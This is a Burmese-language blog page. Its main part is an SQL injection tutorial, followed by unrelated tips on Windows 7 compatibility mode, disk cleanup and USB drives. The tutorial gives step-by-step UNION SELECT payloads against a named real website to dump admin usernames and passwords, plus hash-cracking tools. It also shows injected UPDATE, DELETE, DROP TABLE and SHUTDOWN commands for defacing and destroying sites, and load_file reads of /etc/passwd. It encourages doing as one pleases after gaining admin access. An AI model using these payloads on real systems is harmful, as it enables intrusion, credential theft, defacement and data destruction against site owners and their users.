အထက္ပါနည္းအတုိင္း
http://www.site.com/index.asp?id=5
ဆုိရင္ ေနာက္က ' (apostrophe) ေလးထည့္ၿပီးစမ္းႏုိင္ပါတယ္။
http://www.site.com/index.asp?id=5'
ဒါဆုိရင္
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
ဆုိတဲ႔ error မ်ဳိးေပၚေနတတ္ၿပီး ASP, JSP, CGI, နဲ႔ PHP web pages ေတြမွာ စမ္းသပ္ႏုိင္ပါတယ္။
အကယ္၍ URL မွာ မေပၚတဲ႔ parameters မ်ဳိးဆုိရင္ ၄င္းတုိ႔ရဲ႕ login page, search page, feedback လုိေနရာမ်ဳိးေတြက ရွာႏုိင္ပါတယ္.. တစ္ခ်ဳိ႕ html page ေတြက POST command နဲ႔ ASP page ကုိ ပုိ႔ေဆာင္ေပးတဲ႔ parameters သုံးထားတတ္ပါတယ္.. ဒါဆုိရင္ေတာ့ ၄င္းတုိ႔ရဲ႕ HTML source code ထဲကုိ ၀င္ေရာက္ပါ။ ၿပီးရင္ "FORM" tag ကုိရွာလုိက္ပါ ... ဥပမာ
span class="tags">FORM action=Search/search.asp method=post>
span class="tags">input type=hidden name=A value=C>
span class="tags">/FORM>
ဒီ span class="tags">FORM>span class="tags">/FORM> ႏွစ္ခုၾကားက ၿဖစ္ႏုိင္ေၿခေတြပါ။
span class="tags">FORM action=http://duck/Search/search.asp method=post>
span class="tags">input type=hidden name=A value='a' or 1=1--">
span class="tags">/FORM>
value မွာ အေပၚကအတုိင္း BYPASSING LOGINS မွာသုံးသလုိ စမ္းသပ္ၿပီးရွာေဖြႏုိင္ပါတယ္။
---Columns အေရအတြက္ရွာေဖြၿခင္း---
‘order by’ ကုိအသုံးၿပဳၿပီး Columns မ်ားကုိ ရွာေဖြမွာၿဖစ္ပါတယ္..
URL query ကုိေအာက္ပါတုိင္း ရုိက္ထည့္လုိက္ပါမယ္... '/*' သုိ႔မဟုတ္ '--" ဆုိတာေလးသုံးလုိ႔ရပါတယ္..
www.site.com/article.php?id=5 order by 1/*
အမွားမေပၚဘူးဆုိရင္ ေနာက္တစ္ခါ 2 ဆုိၿပီးတုိးကာ ရုိက္ထည့္ပါမယ္
www.site.com/article.php?id=5 order by 2/*
ယခုအခ်ိန္အထိ အမွားမေပၚေသးဘူးဆုိရင္ ေနာက္တစ္ ထပ္ၿပီးတုိးပါမယ္.. ဒီလုိတုိးတုိးၿပီး အမွားေပၚလာတဲ႔အထိ ရွာေဖြရမွာၿဖစ္ပါတယ္...
www.site.com/article.php?id=5 order by 3/*
အခု 3 ကုိေရာက္တဲ႔အခါ အမွားေတြ႔တယ္ဆုိရင္
ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns ႏွစ္ခုရွိတယ္ဆုိတာ သိသြားပါၿပီ... ဒီလုိနည္းနဲ႔ Column ေတြကုိ တစ္ဆင့္ၿခင္းရွာေဖြရပါတယ္...
ေနာက္တစ္ခု ပုံနဲ႔ တကြ ရွာေဖြၾကည့္ရေအာင္
http://sbisa.org/circle.php?id=26 ကုိၾကည့္မယ္..
http://sbisa.org/circle.php?id=26 ရဲ႕ value ေနာက္မွာ ' ဆုိတဲ႔ (apostrophe) တစ္ခုထည့္လုိက္ပါမယ္..
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sbisaor/public_html/circle.php on line 10 ဆုိတဲ႔ error တစ္ခုေတြ႔ပါလိမ့္မယ္..
ဒါဆုိရင္ေသခ်ာတယ္.. SQL error တစ္ခုတက္ေနၿပီ... တိတိက်က်ေၿပာရရင္ DB Server က MySQL
OK, ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns အေရအတြက္ရွာမယ္...
http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒီအထိအဆင့္အဆင့္ရွာတယ္... error မၿဖစ္ေသးဘူး
7 အထိေရာက္တဲ႔အခါမွာေတာ့ error ေတြ႔တယ္ဆုိရင္ ဒါဟာ 6 Columns ရွိတယ္..
ဒါဆုိရင္ေနာက္ထပ္ UNION SELECT ALL ဆုိတဲ႔ statement တစ္ခုကုိသုံးမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆုိၿပီးရုိက္ထည့္လုိက္မယ္..
ဒါဆုိရင္ 2,3,4 ဆုိတာၿပမယ္.. ဒီအပုိင္းေတြက data ေတြသိမ္းဆည္းထားတဲ႔ Columns ေတြၿဖစ္တယ္...
---MySQL version ရွာၿခင္း---
ဒီ Injection မွာ MySQL Version ကုိ checking လုပ္ဖုိ႔လုိပါတယ္... . Version အား Checking လုပ္ရန္ @@version သုိ႔မဟုတ္ version() functions ေတြကုိသုံးေပးရပါမယ္..
အခု @@version ကုိ data ေတြသိမ္းဆည္းထားတဲ႔ column မွာထည့္ၿပီး MySQL version ကုိစစ္မယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--
သုိ႔မဟုတ္
http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--
ကုိသုံးႏုိင္ပါတယ္.. တခါတစ္ေလမွာ အထက္ပါနည္းအတုိင္းက error ေတြၿဖစ္တတ္တဲ႔အတြက္ unhex(hex()) ကုိသုံးေပးရပါမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--
ဒါဆုိရင္ Server မွာ အသုံးၿပဳေနတဲ႔ MySQL ရဲ႕ version ကုိေဖာ္ၿပေပးသြားပါလိမ့္မယ္...
အကယ္၍ user တုိ႔ ၊ database တုိ႔ကုိ check ခ်င္တယ္ဆုိရင္ ေအာက္ပါတုိင္း checking လုပ္ႏုိင္ပါတယ္..
www.site.com/article.php?id=5 UNION ALL SELECT user(),2/*
www.site.com/article.php?id=5 UNION ALL SELECT database(),2/*
ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--
--MySQL 5 ႏွင့္အထက္ injection---
အခုကၽြန္ေတာ္တုိ႔ ရတာ MySQL version 5.0.90 ၿဖစ္ပါတယ္... MySQL version 5 မွာ information_schema ဆုိတဲ႔ အသုံး၀င္တဲ႔ funtion တစ္ခုပါ၀င္ၿပီး ၄င္းက လက္ရွိ DB server ရဲ႕ tables နဲ႔ columns ေတြကုိ ထိန္းသိမ္းထားတာၿဖစ္ပါတယ္...
Tables ေတြကုိရယူရန္ table_name from information_schema.tables ဆုိတာကုိသုံးသလုိ
Columns ေတြကုိရယူရန္ column_name from information_schema.columns ဆုိတာကုိသုံးရပါမယ္..
ေနာက္တစ္ခုကေတာ့ ဒီ site အေပၚမွာ ၿမင္ရေအာင္လုိ႔ group_concat(table_name) ကုိ Tables ေတြအတြက္နဲ႔
group_concat(column_name) ကုိ Columns ေတြအတြက္သုံးေပးရပါတယ္...
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
ေစာေစာက ကၽြန္ေတာ္တုိ႔ MySQL version ကုိ @@version အစား unhex(hex()) နဲ႔သုံးခဲ႔ရတယ္ဆုိရင္ အခု Table နဲ႔ Column ကုိရွာတဲ႔အခါမွာလည္း အဲ႔လုိပဲ သုံးေပးရပါတယ္။
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
ေနာက္ထက္တစ္ခါ ကၽြန္ေတာ္တုိ႔ Columns ေတြကုိၾကည့္မယ္ဆုိရင္
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema=database()--
ဒါဆုိရင္ DB ထဲက table ေတြကုိ ေဖာ္ၿပေပးပါၿပီ... အခု ကၽြန္ေတာ္တု႔ိဒီ tables ေလးေတြကုိ စနစ္တက် မွတ္သားထားပါမယ္... ေနာက္တစ္ဆင့္တက္ကာ ကၽြန္ေတာ္တုိ႔လုိခ်င္တဲ႔ user name နဲ႔ password ေတြ သိမ္းထားတဲ႔ table ကုိၾကည့္ပါမယ္...
group_concat ကုိပဲ ဆက္လက္သုံးပါမယ္.. ဒါေပမဲ႔ ကၽြန္ေတာ္တုိ႔ လုိခ်င္တဲ႔ username, password ေတြသိမ္းထားေလာက္တဲ႔ columns ေတြထဲက စစ္ထုတ္ယူမွာပါ။ ဒီေနရာမွာ ကၽြန္ေတာ္တုိ႔ မွန္းထားတဲ႔ table အမည္ကုိ from information_schema.tables where table_schema=database-- ေနရာမွာ ထည့္သြင္းမွာၿဖစ္ပါတယ္..
0x3a ဆုိတာကေတာ့ ":" ရဲ႕ hex code ပါ။
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(username,0x3a,password),5,6 from admin--
ဒါဆုိရင္ေတာ့ မိမိတုိ႔လုိခ်င္တဲ႔ username နဲ႔ password ကုိရသြားပါၿပီ... ရရွိထားတဲ႔ password ဟာ plaintext ၿဖစ္တယ္ဆုိရင္ေတာ့ ထပ္ၿပီးေခါင္းရႈပ္စရာမလုိေတာ့ဘူးေပါ႔
တစ္ခ်ဳိ႕ကေတာ့ password hashed လုပ္ထားတဲ႔ အတြက္ ၄င္းတုိ႔အား hash cracker ေတြနဲ႔ ေၿဖထုတ္ေပးရပါလိမ့္မယ္..
ဥပမာ admin:3a39ec8cd0c399cc247936ad5e0b6927
John The Ripper
www.openwalls.org
Cain & Able
www.oxid.it
hash လုပ္ထားတဲ႔ password ေတြသာဆုိရင္ေတာ့ အနည္းငယ္ခက္သြားပါလိမ့္မယ္... အထက္ပါ hash ကုိ crack လုပ္လုိက္ရင္ admin:PlanetCreator ဆုိၿပီးရပါမယ္..
ကဲ ဒါဆုိရင္ေတာ့ admin နဲ႔ password ကုိရၿပီဆုိရင္ ကုိယ္လုပ္ခ်င္သလုိလုပ္ေပေတာ့..
---MySQL version 4 injection---
MySQL version က 4 ၿဖစ္မယ္ဆုိရင္ version 5 လုိ information_schema.tables and information_schema.columns ကုိ support မလုပ္တဲ႔အတြက္ table name နဲ႔ column name ေတြကုိ guess လုပ္ရပါတယ္... ေနာက္တစ္ခုက error message အေပၚမွာအေၿခခံၿပီးခန္႔မွန္းရတာပါ။ The error reports pnc_article in the error ဆုိရင္ pnc ဆုိတဲ႔ prefix ကုိသုံးထားတဲ႔အတြက္ table name က pnc ဆုိတာ ခန္႔မွန္းလုိ႔ရႏုိင္ပါတယ္။
ဥပမာ ကၽြန္ေတာ္က table name ကုိ user ဆုိၿပီး ခန္႔မွန္းလုိက္မယ္.. ဒါဆုိရင္ ေအာက္ပါအတုိင္းရုိက္ထည့္ေပးၾကည့္မယ္ဆုိပါစုိ႔
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*
အထက္ပါအတုိင္းရုိက္ထည့္လုိက္လုိ႔ error ၿဖစ္ေနတယ္ဆုိရင္ ဒါဟာ table မရွိလုိပဲ... ေနာက္တစ္ခါထပ္ၿပီး guess လုိက္ပါ... table name ကုိ tbluser ဆုိၿပီးထားလုိက္ပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*
ဒီလုိနည္းနဲ႔ table name ေတြ column ေတြအား ခန္႔မွန္းၿပီးထည့္သြားရပါလိမ့္မယ္...
www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
ေနာက္ဆုံး username နဲ႔ password ကုိ ရတဲ႔အထိေပါ႔...
Table name အခ်ိဳ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.
ဒါဟာ Injection ရဲ႕ လ်ဳိ႕၀ွက္ထားတဲ႔ Data မ်ားကုိ ရယူတဲ႔အပိုင္းၿဖစ္ပါတယ္... Admin ရဲ႕ username & password ရၿပီဆုိရင္ Admin Login Page မွာရုိက္ထည့္ရပါမယ္... Joomla ဆုိရင္ /administrator နဲ႔ Wordpress ဆုိရင္ /wp-admin ၿဖစ္ပါတယ္.. အခ်ဳိ႕ site ေတြက admin panel ကုိရွာရခက္ ေနပါလိမ့္မယ္.. ဒါဆုိရင္ admin panel finder ေလးေတြကုိသုံးၿပီးရွာေဖြရပါလိမ့္မယ္...
Admin Panel Finder http://www.planetcreator.net/planetcreator/adminpanelfinder/ နဲ႔ရွာႏုိင္ပါတယ္။
---Site အားၿပင္ဆင္ၿခင္း ---
အခ်ဳိ႕ေသာ Site ေတြက admin ရဲ႕ password ကုိရေပမဲ႔ admin panel ကုိရဖုိ႔ခက္ခဲၿခင္း၊ ရွာမေတြ႔ၿခင္းေတြနဲ႔ ၾကံဳရတတ္ပါတယ္... ဒီလုိေနရာမွာ SQL commands ေတြကုိသုံးၿပီး အထဲက site ရဲ႕ contents ေတြကုိၿပင္ဆင္ေၿပးသြားရမွာၿဖစ္ပါတယ္...
ဒါေလးေတြက အေရးပါတဲ႔ command ေလးေတြပါ
UPDATE: It is used to edit infos already in the db without deleting any rows.
DELETE: It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.
UPDATE :-
www.site.com/article.php?id=5
ဆုိၾကပါစုိ႔ကၽြန္ေတာ္တုိ႔ရဲ႕ query က ေအာက္ပါအတုိင္းၿဖစ္မယ္ဆုိရင္
SELECT title,data,author FROM article WHERE id=5
(table name နဲ႔ column ေတြက အထက္ပါအတုိင္းရွာေဖြက ထည့္ေပးရတာၿဖစ္ပါတယ္)
ေအာက္ပါအတုိင္း site ကုိၿပင္ေပးသြားပါမယ္...
www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*
ခက္ဆန္းဆန္းေလး ထက္ၿပီး အရစ္တက္လုိက္မယ္ဆုိရင္
www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*
သတ္မွတ္ထားတဲ႔ page ေၿပာင္းလဲၿပီး update လုပ္ခ်င္တယ္ဆုိရင္ေတာ့ ေအာက္ပါအတုိင္း ရုိက္ထည့္ေပးရပါတယ္..
www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*
DELETE:- DB Server ထဲကေန အၿမဲတမ္းဖ်က္ပစ္ေတာ့မယ္ဆုိရင္ DELETE command ကုိသုံးသြားပါမယ္..
www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
သတ္မွတ္ထားတဲ႔ page ကုိ delete လုပ္ခ်င္တယ္ဆုိရင္ ေအာက္ပါ table name ရဲ႕ ေနာက္ထဲမွ WHERE နဲ႔ page id ကုိထည့္သြင္းသြားရပါမယ္...
www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
ဒီတစ္ခုကေတာ့ DROP TABLE ပါ... Table အလုိက္ ဖ်က္ခ်င္တယ္ ဆုိရင္ေတာ့ DROP Table နဲ႔ table name ကုိဆုိၿပီးသုံးပါမယ္...
www.site.com/article.php?id=5 DROP TABLE article/*
ဒီအတုိင္းဖ်က္ရင္ table ေတြေကာ အထဲမွာပါတဲ႔ contents ေတြေကာ အားလုံး ပ်က္သြားပါလိမ့္မယ္...
SHUTTING DOWN MySQL SERVER:
www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;
LOADFILE:
Server အထဲက .htaccess, .htpasswd ေတြနဲ႔ password files ေတြၿဖစ္တဲ႔ etc/passwd စသည့္ ဖုိင္ေတြကုိ ယူခ်င္တယ္ဆုိရင္ေတာ့ LOADFILE ကုိသုံးရပါတယ္... ဒါကအသုံးေတာ့နည္းပါတယ္....
www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*
အကယ္၍ hex ေတြနဲ႔ဆုိရင္ေတာ့ ေအာက္ပါတုိင္း သုံးပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)
ဒါကုိ Hex based SQL Injection လုိ႔လည္းေခၚႏုိင္ပါတယ္..
* SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
ဒါဟာ server ရဲ႕ c:\boot.ini ကုိ ဆြဲယူေပးပါလိမ့္မယ္..
---MySQL ROOT---
MySQL version 5 နဲ႔အထက္မွာ mysql.user ဆုိတဲ႔ table တစ္ခုဟာ MySQL servers ေတြမွာရွိပါတယ္... အထဲမွာ hash လုပ္ထားတဲ႔ Password နဲ႔ username ေတြပါ၀င္ပါတယ္... ၄င္းအထဲက
hash ဟာ mysqlsha1 ၿဖစ္တဲ႔အတြက္ John The Ripper နဲ႔ crack လုပ္ဖုိ႔ခက္ပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*
ဒီအတြက္ InsidePro Password Recovery Software ကုိသုံးလုိ႔ရပါတယ္..
http://www.insidepro.com
---အသုံး၀င္တဲ႔ MySQL commands အခ်ိဳ႕ပါ..---
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database
SQL Injection မွာ အသုံးၿပဳတဲ႔ အေၿခခံေတြပဲ ရွိပါေသးတယ္... ဒီထက္မ်ားတဲ႔ functions ေတြအမ်ားၾကီးရွိသလုိ ဒီထက္ပုိၿပီးနက္နဲတဲ႔ အသုံးၿပဳပုံေတြရွိပါတယ္... ေလ့လာတဲ႔သူေတြအေနနဲ႔ မိမိတုိ႔ကုိယ္တုိင္ SQL commands ေတြကုိ အရင္ဆုံး ကုိယ္တုိင္စမ္းစစ္ၿပီး မိမိတုိ႔ရဲ႕ SQL commands အသုံးၿပဳမႈအရည္အခ်င္းကုိ ၿမင့္တင္သင့္ပါတယ္။
Thursday, July 19
Window 7၌အသံုးျပဳလို႔မရေသာေဆာ့၀ဲလ္မ်ားကို Compatible ျဖစ္ေအာင္လုပ္နည္း
·
အခ်ိဳ႕ေသာေဆာ့၀ဲလ္မ်ား ၀င္းဒုိး 7 နဲ႔ compatible မျဖစ္ရင္ အင္စေတာ့ထည့္သြင္းလို႔မရ
တာေတြ႔ရတယ္။ ေနာက္ျပီးထည့္သြင္းလို႔ရျပန္ေတာ့လဲ အသံုးျပဳလို႔မရတာေတြျဖစ္လာျပန္
တယ္။ Window 7 ေၾကာင့္ ေဆာ့၀ဲလ္မ်ား Installation လုပ္ရာမွာ အခက္အခဲရွိလွ်င္
အသံုးျပဳႏုိင္ရန္ ပို႔စ္တင္လိုက္တာပါ။
လုပ္နည္းေလး...
၁။ Install လုပ္ခ်င္သည့္ ေဆာ့၀ဲလ္၏ icon ကုိ Right Click လုပ္၍ Properties ကုိ ဖြင့္ပါ။
၂။ Box က်လာလွ်င္ Compatibility tab ကုိ ေရြးပါ။
+/- အျပည့္အစံုသို႔
၃။ Run this program in compatibility mode for: ကုိ အမွန္ျခစ္ေပးပါ။
၄။ Window XP (Service Pack 3) သုိ႔မဟုတ္ အဆင္ေျပရာ Version ကုိ ေရြးခ်ယ္ပါ။
၅။ Apply လုပ္ Ok ။
၆။ မိမိ Install လုပ္ခ်င္သည့္ ေဆာ့၀ဲလ္ Setup.exe ဖုိင္ကုိ ျပန္ဖြင့္ၿပီး Install လုပ္ၾကည့္ပါ။
(အကယ္၍ အင္စေတာထည့္သြင္းထားျပီးလို႔ အသံုးျပဳလို႔မရရင္ ၎ေမာင္းထားျပီး
ေသာပရိုဂရမ္ (ပရိုဂရမ္ရဲ႕ ရဲ႕ icon) ကို Right Click ေထာက္၊ Properties ကို
၀င္ျပီး အေပၚက အစီအစဥ္အတိုင္းသာလုိက္လုပ္ပါ
Ref: technologymynoat/
ဟတ္ဒစ္Space မ်ားမ်ားရရွိျပီး ကြန္ျပဴတာျမန္ဆန္ေစရန္
ကြန္ပ်ဴတာ တစ္လံုးမွာ hard disk ရဲ႕ လုပ္ေဆာင္မႈ႔ ဟာ အေရးပါလွပါတယ္ မိမိရဲ႕ hard disk မွာ free space နည္းေနရင္ ကြန္ပ်ဴတာ လုပ္ေဆာင္မႈ ေႏွးလာၿခင္း၊ program မ်ား run ရာတြင္ ၾကန္႔ၾကာၿခင္းတို႔ ၿဖစ္ေပၚလာေလ႔ရွိပါတယ္…. Window တစ္ခု စတင္ လိုက္တဲ႔ အခါကတည္းက default disk setting ကိုWaste capacity ကို မ်ားစြာေပးထားတာပါ ကြ်န္ေတာ္ တို႔က အဲဒီမလို အပ္တဲ႔ wasted capacityကို ေလွ်ာ႔ခ်လိုက္ၿခင္းအားၿဖင္႔ free space မ်ားမ်ားရ ရွိေအာင္ လုပ္ေဆာင္နိုင္မွာ ၿဖစ္ပါတယ္..
လုပ္ေဆာင္ရမဲ႔ အဆင္႔နည္းနည္းမ်ားပါတယ္.. တစ္ဆင္႔ၿခင္းကို ေသေသခ်ာခ်ာ လုပ္ေဆာင္ သြားရင္ လြယ္လြယ္ေလးပါ……
ပထမဆံုး my computer ကို ဖြင္႔ပါ Local disk :C ရဲ႕ properties မွာ used space , free space ဘယ္ေလာက္ရွိတယ္ ဆိုတာကို မွတ္သားထားလိုက္ပါ ဒါမွသာ ကြ်န္ေတာ္တို႔ရဲ႕ လုပ္ေဆာင္မႈ႔ဟာ အက်ိဳးသက္ေရာက္ မႈ႔ရွိမရွိ ကို သိရွိနိုင္မွာ ပါ ..မွတ္သားၿပီးသြားရင္ေတာ႔
၁။ Start Menu , Control Panel မွ Power options ကို click ပါ
က်လာတဲ႔ Power options properties dialog box မွ Hibernate tab ကို ထပ္ၿပီး click လိုက္ပါဦး
ၿပီးရင္ Enable Hibernation ဆိုတဲ႔စာေၾကာင္းေလးကို uncheck လုပ္ၿပီး Apply , Ok ေပးပါမယ္..
၂။ Run box မွာ sysdm.cpl လို႔ရိုက္ထည္႔ၿပီးေတာ႔ enter ေခါက္ပါ
ရရွိလာတဲ႔ system properties dialog box မွ System Restore tab ကို ထပ္ၿပီး click ပါမယ္
Available drivers : ေအာက္က ( C ) ကို select ေပးၿပီး settings button ကို click ပါမယ္
Device Settings ဆိုတဲ႔ box တစ္ခုထပ္မံ က်ေရာက္လာတာ ကို ေတြ႔ရမွာပါ
Disk space to use: ေအာက္မွာ မူလက 12 % ( 6132 MB ) ရွိရာမွ 3 % ( 1386 MB) သို႔ ေလွ်ာ႔ခ်လိုက္ပါမယ္. ၿပီးရင္ Ok ေပးပါ..
၃။ Start Menu , Internet explorer ကို open ရပါမယ္
Menu bar မွ tools , Internet options ကို click ပါ
Delet files ကို ထပ္မံ click ပါမယ္ alert box တက္လာပါမယ္ ..
Delete all offline content ဆိုတဲ႔ စာေၾကာင္းကို check ေပးၿပီး Ok ေပးပါ
၄။ Delete files button ရဲ႕ ညာဘက္ေဘးက settings ကို click ပါမယ္
Amount of disk space to use : စာေၾကာင္းေအာက္က box ထဲမွာ မူလက 474 MB ေပးထားတာကို 50 MB လို႔ ၿပင္ရိုက္ၿပီး OK ,OK………..
ေနာက္ဆံုးအဆင္႔ကေတာ႔ shift+delete နဲ႔ ဖ်က္မထား မိလို႔ Recycle Bin ထဲက မလိုအပ္တဲ႔ ဖိုင္ေတြကို right click ေထာက္ၿပီး Empty Recycle Bin လုပ္ပါမယ္ ၿပီးပါၿပီဗ်ာ My computer ထဲ က Disk C မွာ free space ဘယ္ေလာက္တိုးလာ သလဲဆိုတာ စစ္ေဆးၾကည္႔လိုက္ပါဦး………
အႏွစ္ခ်ဳပ္ကေတာ႔..
• Recycle Bin: Default 10 % dropped to 1%
• Hibernation:Default ON ( for notebooks) switched OFF
• Internet explorer: Default 474 MB dropped to 50 MB
• System Restore: Default 12% dropped to 1% (~ 1 GB)
Tuesday, July 17
USB Pen Drive ၏ လၽွို႔ဝွက္ခ်က္ (၁ဝ)ခု
Hard Disk မွာ ေနရာလြတ္ နည္းပါးေနသူေတြအတြက္ အလုပ္မွအိမ္၊ အိမ္မွေက်ာင္း၊ အခ်က္အလက္ သင္ခန္းစာ၊ အလုပ္ဖိုင္ေတြကို သယ္ေဆာင္သြားလိုသူေတြအတြက္၊ စနစ္တစ္ခုလုံးကို လုံျခဳံစိတ္ခ်မွုျပည့္ဝစြာ အလုပ္လုပ္ လိုၿပီး အစီအစဥ္တက် ရွိလိုသူမ်ားအတြက္ USB Thumb Drive ရဲ့ လွ်ိဳ႕ဝွက္ခ်က္ေလးမ်ားကို စုစည္းေဖာ္ျပ လိုက္ပါတယ္။
1. USB Drive ကို icon အေနနဲ႔ သုံးနိုင္ပါတယ္တကယ္လို႔ ကြန္ပ်ဴတာမွာ USB Hub တစ္ခုကို ထားရွိသုံးစြဲမယ္ ဆိုရင္၊ ေနာက္ၿပီး USB အမ်ားႀကီးနဲ႔ Multiple USB port ေတြ ထားရွိ သုံးစြဲမယ္ဆိုရင္ အမ်ိဳးမ်ိဳး အစားစားကြဲျပားတဲ့ ကိုယ့္ရဲ့ USB ကို icon ေတြအေနနဲ႔ ေဖာ္ျပ ေပးထားနိုင္ပါတယ္။ အဲဒီလို ေဖာ္ျပေပးတဲ့ XP, Vista, Windows 7 ေတြမွာ ပါဝင္တဲ့ custom icon ေတြကို အသုံးျပဳၿပီး folder ေတြကို icon ပုံစံခ်ိန္းတဲ့ ပုံစံမ်ိဳးအဆင့္ပဲ လြယ္လြယ္ ကူကူ ရွိပါတယ္။ ပထမဦးဆုံးအေနနဲ႔ (.ico) format ကို drive ထဲမွာ အရင္ ေမာင္းထည့္ရ ပါမယ္။ အကယ္၍ web application တစ္ခုျဖစ္တဲ့ convert icon ကို အသုံးျပဳလည္း ရပါတယ္။ icon ကို အမ်ိဳးအစားကြဲျပားစြာနဲ႔ USB မွာ ရည္ညြန္းေဖာ္ျပေပးမွာ ျဖစ္တဲ့အတြက္ ဘယ္ USB က ဘာ file ေတြ ပါဝင္တယ္ဆိုတာ အလြယ္တကူ သိရွိရမွာပါ။
2. Google ၏ OS ကို အိတ္ထဲ ထည့္ထားနိုင္ပါတယ္Google ၏ OS ျဖစ္တဲ့ Chrome OS ကို USB drive ထဲမွာ ထည့္သြင္းၿပီး ကိုယ့္ကြန္ပ်ဴတာရဲ့ ဒုတိယ OS အျဖစ္ ထားရွိ သုံးစြဲနိုင္ပါတယ္။ အလြန္ျမန္ဆန္ၿပီး ကိုယ့္စိတ္ႀကိဳက္ custom ျပဳလုပ္ထားနိုင္ပါတယ္။ ဒီဇိုင္း အဆင္အျပင္ေတြကအစ ပါဝင္တဲ့ coding ေတြကို သြားျပန္ၿပီး ျပင္ဆင္ေရး သားနိုင္တဲ့ open source OS တစ္ခု ျဖစ္ပါတယ္။
